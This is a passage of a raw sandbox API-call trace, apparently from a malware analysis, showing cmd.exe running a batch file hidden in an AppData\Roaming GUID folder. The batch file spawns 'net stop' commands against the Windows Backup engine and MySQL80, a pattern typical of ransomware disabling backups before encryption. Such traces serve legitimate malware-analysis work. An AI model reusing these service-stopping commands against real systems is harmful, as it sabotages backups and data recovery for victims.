0x3f8278 [0196.170] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0196.170] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0196.171] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x210) returned 0x3f4ba8 [0196.171] GetProcessHeap () returned 0x3e0000 [0196.171] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x34) returned 0x3f8278 [0196.172] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x418) returned 0x3f6e88 [0196.172] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0196.172] SetErrorMode (uMode=0x0) returned 0x1 [0196.172] GetProcessHeap () returned 0x3e0000 [0196.172] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0196.172] GetProcessHeap () returned 0x3e0000 [0196.172] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0196.173] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0196.173] GetProcessHeap () returned 0x3e0000 [0196.173] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0196.173] GetProcessHeap () returned 0x3e0000 [0196.173] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0196.173] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0196.173] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0196.174] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0196.174] GetLastError () returned 0x2 [0196.174] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0196.174] GetLastError () returned 0x2 [0196.175] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0196.175] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0196.175] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0196.176] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0196.176] GetLastError () returned 0x2 [0196.176] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0196.176] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0196.177] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0196.177] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0196.177] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0196.177] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0196.177] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x18) returned 0x3f4298 [0196.178] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0196.178] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop wbengine /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop wbengine /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop wbengine /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0x820, dwThreadId=0x880)) returned 1 [0196.183] CloseHandle (hObject=0x74) returned 1 [0196.183] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0196.183] GetProcessHeap () returned 0x3e0000 [0196.183] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0196.183] GetEnvironmentStringsW () returned 0x3f8408* [0196.183] GetProcessHeap () returned 0x3e0000 [0196.183] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0196.183] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0196.183] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0196.401] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0196.401] CloseHandle (hObject=0x78) returned 1 [0196.401] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0196.401] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0196.401] GetProcessHeap () returned 0x3e0000 [0196.401] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0196.401] GetEnvironmentStringsW () returned 0x3f8408* [0196.401] GetProcessHeap () returned 0x3e0000 [0196.401] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0196.401] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0196.401] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0196.401] GetProcessHeap () returned 0x3e0000 [0196.401] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0196.401] GetEnvironmentStringsW () returned 0x3f8408* [0196.401] GetProcessHeap () returned 0x3e0000 [0196.401] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0196.401] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0196.401] GetProcessHeap () returned 0x3e0000 [0196.402] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0196.402] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0196.402] _get_osfhandle (_FileHandle=1) returned 0x264 [0196.402] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0196.402] _get_osfhandle (_FileHandle=1) returned 0x264 [0196.402] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0196.402] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0196.402] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0196.402] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0196.402] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0196.402] SetConsoleInputExeNameW () returned 0x1 [0196.402] GetConsoleOutputCP () returned 0x1b5 [0196.403] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0196.403] SetThreadUILanguage (LangId=0x0) returned 0x409 [0196.403] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0196.403] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0196.403] _get_osfhandle (_FileHandle=3) returned 0x78 [0196.403] SetFilePointer (in: hFile=0x78, lDistanceToMove=2377, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x949 [0196.403] GetProcessHeap () returned 0x3e0000 [0196.403] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0196.403] GetProcessHeap () returned 0x3e0000 [0196.403] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0196.403] GetProcessHeap () returned 0x3e0000 [0196.403] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0196.403] GetProcessHeap () returned 0x3e0000 [0196.403] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0196.403] GetProcessHeap () returned 0x3e0000 [0196.403] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0196.403] GetProcessHeap () returned 0x3e0000 [0196.403] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0196.403] GetProcessHeap () returned 0x3e0000 [0196.403] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0196.403] GetProcessHeap () returned 0x3e0000 [0196.403] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0196.403] GetProcessHeap () returned 0x3e0000 [0196.404] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0196.404] GetProcessHeap () returned 0x3e0000 [0196.404] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0196.404] GetProcessHeap () returned 0x3e0000 [0196.404] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1290 | out: hHeap=0x3e0000) returned 1 [0196.404] GetProcessHeap () returned 0x3e0000 [0196.404] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0196.404] GetProcessHeap () returned 0x3e0000 [0196.404] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0196.404] _get_osfhandle (_FileHandle=3) returned 0x78 [0196.404] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x949 [0196.404] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0xf78, lpOverlapped=0x0) returned 1 [0196.404] SetFilePointer (in: hFile=0x78, lDistanceToMove=2398, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x95e [0196.404] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=21, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop MySQL80 /y\r\n\ner$SBSMONITORING /y\r\n\r\nÇ¥ /y\r\nlures\r\nnded\r\n") returned 21 [0196.405] _get_osfhandle (_FileHandle=3) returned 0x78 [0196.405] GetFileType (hFile=0x78) returned 0x1 [0196.405] _get_osfhandle (_FileHandle=3) returned 0x78 [0196.405] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95e [0196.405] GetProcessHeap () returned 0x3e0000 [0196.405] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0196.405] GetProcessHeap () returned 0x3e0000 [0196.405] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0196.408] _tell (_FileHandle=3) returned 2398 [0196.408] _close (_FileHandle=3) returned 0 [0196.409] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0196.409] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0196.409] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0196.409] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0196.409] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0196.409] _wcsicmp (_String1="net", _String2="CD") returned 11 [0196.409] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0196.409] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0196.409] _wcsicmp (_String1="net", _String2="REN") returned -4 [0196.409] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0196.409] _wcsicmp (_String1="net", _String2="SET") returned -5 [0196.409] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0196.409] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0196.409] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0196.409] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0196.409] _wcsicmp (_String1="net", _String2="MD") returned 1 [0196.409] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0196.409] _wcsicmp (_String1="net", _String2="RD") returned -4 [0196.409] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0196.409] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0196.409] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0196.409] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0196.409] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0196.409] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0196.409] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0196.409] _wcsicmp (_String1="net", _String2="VER") returned -8 [0196.409] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0196.409] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0196.409] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0196.409] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0196.409] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0196.409] _wcsicmp (_String1="net", _String2="START") returned -5 [0196.409] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0196.409] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0196.409] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0196.410] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0196.410] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0196.410] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0196.410] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0196.410] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0196.410] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0196.410] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0196.410] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0196.410] SetErrorMode (uMode=0x0) returned 0x1 [0196.410] GetProcessHeap () returned 0x3e0000 [0196.410] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0196.411] GetProcessHeap () returned 0x3e0000 [0196.411] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0196.411] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0196.411] GetProcessHeap () returned 0x3e0000 [0196.411] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0196.411] GetProcessHeap () returned 0x3e0000 [0196.411] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0196.411] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0196.412] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0196.412] GetLastError () returned 0x2 [0196.412] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0196.412] GetLastError () returned 0x2 [0196.413] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0196.413] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0196.413] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0196.414] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0196.414] GetLastError () returned 0x2 [0196.414] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0196.414] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0196.415] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0196.415] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0196.415] SetErrorMode (uMode=0x0) returned 0x1 [0196.415] GetProcessHeap () returned 0x3e0000 [0196.415] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0196.416] GetProcessHeap () returned 0x3e0000 [0196.416] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0196.416] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0196.416] GetProcessHeap () returned 0x3e0000 [0196.416] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0196.416] GetProcessHeap () returned 0x3e0000 [0196.416] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0196.416] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0196.417] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0196.417] GetLastError () returned 0x2 [0196.417] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0196.417] GetLastError () returned 0x2 [0196.418] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0196.418] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0196.418] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0196.419] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0196.419] GetLastError () returned 0x2 [0196.419] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0196.419] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0196.420] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0196.420] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0196.420] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0196.420] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0196.420] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0196.420] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MySQL80 /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MySQL80 /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop MySQL80 /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x3d0, dwThreadId=0x828)) returned 1 [0196.424] CloseHandle (hObject=0x78) returned 1 [0196.424] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0196.424] GetProcessHeap () returned 0x3e0000 [0196.424] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0196.424] GetEnvironmentStringsW () returned 0x3f8408* [0196.424] GetProcessHeap () returned 0x3e0000 [0196.424] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0196.424] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0196.424] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0196.556] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0196.556] CloseHandle (hObject=0x74) returned 1 [0196.556] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0196.556] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0196.556] GetProcessHeap () returned 0x3e0000 [0196.556] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0196.556] GetEnvironmentStringsW () returned 0x3f8408* [0196.556] GetProcessHeap () returned 0x3e0000 [0196.556] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0196.556] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0196.556] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0196.556] GetProcessHeap () returned 0x3e0000 [0196.556] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0196.556] GetEnvironmentStringsW () returned 0x3f8408* [0196.556] GetProcessHeap () returned 0x3e0000 [0196.556] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0196.556] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0196.557] GetProcessHeap () returned 0x3e0000 [0196.557] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0196.557] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0196.557] _get_osfhandle (_FileHandle=1) returned 0x264 [0196.557] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0196.557] _get_osfhandle (_FileHandle=1) returned 0x264 [0196.557] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0196.557] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0196.557] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0196.557] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0196.557] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0196.557] SetConsoleInputExeNameW () returned 0x1 [0196.557] GetConsoleOutputCP () returned 0x1b5 [0196.558] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0196.558] SetThreadUILanguage (LangId=0x0) returned 0x409 [0196.558] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: 